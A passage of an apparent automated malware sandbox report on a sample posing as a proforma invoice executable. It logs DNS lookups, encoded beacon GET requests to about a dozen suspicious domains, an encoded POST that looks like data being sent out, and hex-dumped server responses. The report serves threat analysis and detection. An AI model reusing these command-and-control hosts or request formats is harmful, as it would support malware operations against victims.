                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002C22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_002C22EE
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 02 Dec 2024 14:24:57 GMTserver: Apacheset-cookie: __tad=1733149497.5221456; expires=Thu, 30-Nov-2034 14:24:57 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 9b 15 dc 04 9b 37 03 c8 8a b3 15 1b 64 3b f3 c7 38 bf cc 3c 86 6d 47 f1 fc 1e e2 7e 2a ec a3 ce 68 27 3b 3f 21 8a 9d 09 b1 d8 a7 7a 3d c2 74 87 ea c1 52 fe e4 6e 7e 3a fd bf 76 c5 32 23 21 ea 3e 02 63 75 9b a3 f7 63 c7 ff fe 0e 63 57 9f 8f 1c 1d 78 8a e1 da d5 dc 68 88 d8 8d 77 5b 5b af ce 5e 2f 5e eb e5 5b 38 02 a3 47 10 d3 a6 cb 30 a2 af 37 da 75 ce cb f4 ac 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38 09 cb ac fa d0 19 7d 0b 2d 7a 1c 07 d5 12 fa 52 28 be 38 9c 9f ab 58 37 b9 29 7b 24 4e cb 09 2f f0 e7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99 2e d6 f0 fd f2 8b 7c a9 ea 9b 78 2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 65 0b a8 8a 1c 04 00 00 Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 02 Dec 2024 14:25:00 GMTserver: Apacheset-cookie: __tad=1733149500.1835738; expires=Thu, 30-Nov-2034 14:25:00 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 9b 15 dc 04 9b 37 03 c8 8a b3 15 1b 64 3b f3 c7 38 bf cc 3c 86 6d 47 f1 fc 1e e2 7e 2a ec a3 ce 68 27 3b 3f 21 8a 9d 09 b1 d8 a7 7a 3d c2 74 87 ea c1 52 fe e4 6e 7e 3a fd bf 76 c5 32 23 21 ea 3e 02 63 75 9b a3 f7 63 c7 ff fe 0e 63 57 9f 8f 1c 1d 78 8a e1 da d5 dc 68 88 d8 8d 77 5b 5b af ce 5e 2f 5e eb e5 5b 38 02 a3 47 10 d3 a6 cb 30 a2 af 37 da 75 ce cb f4 ac 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38 09 cb ac fa d0 19 7d 0b 2d 7a 1c 07 d5 12 fa 52 28 be 38 9c 9f ab 58 37 b9 29 7b 24 4e cb 09 2f f0 e7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99 2e d6 f0 fd f2 8b 7c a9 ea 9b 78 2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 65 0b a8 8a 1c 04 00 00 Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 02 Dec 2024 14:25:03 GMTserver: Apacheset-cookie: __tad=1733149503.5138422; expires=Thu, 30-Nov-2034 14:25:03 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 9b 15 dc 04 9b 37 03 c8 8a b3 15 1b 64 3b f3 c7 38 bf cc 3c 86 6d 47 f1 fc 1e e2 7e 2a ec a3 ce 68 27 3b 3f 21 8a 9d 09 b1 d8 a7 7a 3d c2 74 87 ea c1 52 fe e4 6e 7e 3a fd bf 76 c5 32 23 21 ea 3e 02 63 75 9b a3 f7 63 c7 ff fe 0e 63 57 9f 8f 1c 1d 78 8a e1 da d5 dc 68 88 d8 8d 77 5b 5b af ce 5e 2f 5e eb e5 5b 38 02 a3 47 10 d3 a6 cb 30 a2 af 37 da 75 ce cb f4 ac 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38 09 cb ac fa d0 19 7d 0b 2d 7a 1c 07 d5 12 fa 52 28 be 38 9c 9f ab 58 37 b9 29 7b 24 4e cb 09 2f f0 e7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99 2e d6 f0 fd f2 8b 7c a9 ea 9b 78 2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 65 0b a8 8a 1c 04 00 00 Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e
                Source: global trafficHTTP traffic detected: GET /fev0/?wzcP=iLdd&bV=ZsYTLU62Pg4Ji1Y7yKx0R+43dnCF/DoTsxMfn/Xy/YyeGOVtNzq5pky0tbrPVR8P9zBOlb50dZZ9z8YaOITKn/SU+87cwr0VJj825LSMeKmzjVPSaMyWz8le8KSNg+oL/g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.thaor56.onlineUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /98j3/?bV=jo1iJOnj8ueGZPJABf2g0H8HuOKbJgV1DdtSaCSQL5v3UEYBE5VATgrqgu9yCYXU1qT81UG2HbOLQLBbZNDoMbelSKgrKC4QuJZGFDN8wI4iJ7kAaJbEHf+I5C8wBrJZeg==&wzcP=iLdd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.optimismbank.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /r3zg/?bV=du4jOMLkh7fLnmDuLYOIPa2Wp2ys3F+jaV3EKcXkS3D/yxi6pio40SibWtKrR6Fw1AeDGXhTcKeneAqCGOT06b5FqqYL9BGdKsZ2rM8t/H5MOkDBuj8Escbc06JqN3wYtw==&wzcP=iLdd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.greenthub.lifeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /n2c9/?bV=3x/7f4nzUvf4Ssmpt1jlNGgCnZA9EhdoZs8QEOaGeCkTK2Ae1JBrg2/7Qirl6WfPBEFIuXRetS7qNq3tJgV/MvpOFGl3CcQklZlekjGrp+0XQqfczBPHNrv5hMhkDFTE+A==&wzcP=iLdd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.laohub10.netUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /uf7y/?bV=X8Xx4Xb3zOwIp/YnRuUSDS9+m9M27HztmVzPPBr+rNKRcobOh5vjSVUUxnTRN3k+HcX7svN7WZWipHk078Y7gow9os+aP1J4EzwTxXBX+A+Fa6CXCkfj46dm/6YpVTzCxw==&wzcP=iLdd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.bankseedz.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /3iym/?bV=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLulZu44boXAwOrdyhUlC/OJ4E8YsdUb7oGGCmNRhxxg5yFhA==&wzcP=iLdd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.madhf.techUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /hkgx/?wzcP=iLdd&bV=wgVoJ8uM9T0/Zez2re1RszMbFHmAlDimGOKD8PxxFFLfP5o8U05sZY6pknTlSn+/tcq1eo8k+yVAgRwnrxxUvS5L8ubcdexDHAV6gjjxkBAdNrGiSX2pXpBWFAYYwVQiPg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.xcvbj.asiaUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /31pt/?bV=TMDpBYanOquY9Rx7lbKrlsthbxkcecghv73C9/MKdrwqjZcj4ORMyeLFBityLVio1oCUCVJYl2rwHayMePC/X0tkqytLQfQBhcOdFFeEx3iaXLjcxC54/kiaY/bAFrqB8g==&wzcP=iLdd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.yc791022.asiaUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /p3j6/?bV=OVR2CF7p+NAClGW1MELAdr9D19OOCZyiV2x0cNqPuUjpn/Qhs1nMs1p1ZXuPw6NSEK+YKob7dwv93+8G93LPKWG5WAS3psYmnqJIK+9TxAzVw33X+qLRjr2nQR0/ahQ8dw==&wzcP=iLdd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.43kdd.topUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /hxi5/?bV=/xN+QifpSgLb8oJZvOcEecwEXTNjyqH/ixYmgFld7FWiq7hEgfqLv6xcCSKy7O4D9GLUZYEuvgkAAG4+HQzECOhz/eBMNQtzbXvy0GcsSmUnEXx6wmc7on4m5IV1LddeYQ==&wzcP=iLdd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.jcsa.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /j8pv/?bV=JIuj9wxSnK6mEyWHgqme9cDOp2JPGD2avn5HAjA8ht24L6v+vQ9uqWv6ig59Dwg+VmGSo2u3Iy71OFL1070b7jwAWfgjYo1ceHXmQsmagjo2PVHkyEcMWf8OCye8gCuDoA==&wzcP=iLdd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.1secondlending.oneUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /swhs/?bV=8xf1FTtyUpYkrTYPPLWUAP++SxZR47Hqllrz0dKQmws7hy/+lCnqv8MjCvT/8dHN8wn+YkpcLfbwvxo0J0bTQ0tlUhCAXdO2W2lcbMXoQ37jkanwSyGhs5UT/ITwg7la8g==&wzcP=iLdd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.zkdamdjj.shopUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /8gp4/?bV=FEeZWlhMd48ysDs290a5kdk4wKu/Usks8a8x1+EEc0Vq+hoQB7y77HQo5oow9pdvGKqyyoz5OAo+pUm014OHEU2GNEJ4iSl/EJTCwnsfNhVKTNH/IB8Mre+zSk1Y9E9ALA==&wzcP=iLdd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.rgenerousrs.storeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.thaor56.online
                Source: global trafficDNS traffic detected: DNS query: www.optimismbank.xyz
                Source: global trafficDNS traffic detected: DNS query: www.greenthub.life
                Source: global trafficDNS traffic detected: DNS query: www.laohub10.net
                Source: global trafficDNS traffic detected: DNS query: www.bankseedz.info
                Source: global trafficDNS traffic detected: DNS query: www.madhf.tech
                Source: global trafficDNS traffic detected: DNS query: www.xcvbj.asia
                Source: global trafficDNS traffic detected: DNS query: www.yc791022.asia
                Source: global trafficDNS traffic detected: DNS query: www.43kdd.top
                Source: global trafficDNS traffic detected: DNS query: www.jcsa.info
                Source: global trafficDNS traffic detected: DNS query: www.1secondlending.one
                Source: global trafficDNS traffic detected: DNS query: www.zkdamdjj.shop
                Source: global trafficDNS traffic detected: DNS query: www.rgenerousrs.store
                Source: global trafficDNS traffic detected: DNS query: www.bpgroup.site
                Source: unknownHTTP traffic detected: POST /98j3/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 203Connection: closeHost: www.optimismbank.xyzOrigin: http://www.optimismbank.xyzReferer: http://www.optimismbank.xyz/98j3/User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36Data Raw: 62 56 3d 75 71 64 43 4b 2b 4f 2f 34 4b 6d 51 5a 74 78 75 65 35 57 6d 69 48 55 59 31 75 53 2b 47 31 6f 4a 62 6f 35 2f 54 32 4f 5a 46 2f 7a 48 58 6c 63 4b 41 64 45 52 49 6a 50 4a 75 62 46 61 65 4e 6e 64 30 59 79 64 34 57 79 76 48 62 4f 42 62 59 64 79 64 66 4c 45 50 49 62 6b 54 4b 4e 52 4f 54 6f 76 75 59 68 75 4a 41 49 75 31 5a 30 59 48 37 67 42 58 63 43 42 42 4f 61 49 34 67 6b 32 47 62 34 76 48 33 6c 36 51 46 4d 67 41 62 66 43 58 55 6e 45 5a 31 35 51 74 39 6b 51 6e 2b 48 70 6f 42 77 4d 70 48 77 59 46 66 44 30 32 6d 6e 4b 51 33 72 76 32 57 6a 47 77 59 45 68 52 43 38 31 30 4a 69 4a 4a 30 51 72 48 58 4d 3d Data Ascii: bV=uqdCK+O/4KmQZtxue5WmiHUY1uS+G1oJbo5/T2OZF/zHXlcKAdERIjPJubFaeNnd0Yyd4WyvHbOBbYdydfLEPIbkTKNROTovuYhuJAIu1Z0YH7gBXcCBBOaI4gk2Gb4vH3l6QFMgAbfCXUnEZ15Qt9kQn+HpoBwMpHwYFfD02mnKQ3rv2WjGwYEhRC810JiJJ0QrHXM=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 02 Dec 2024 14:23:39 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 14:24:11 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not 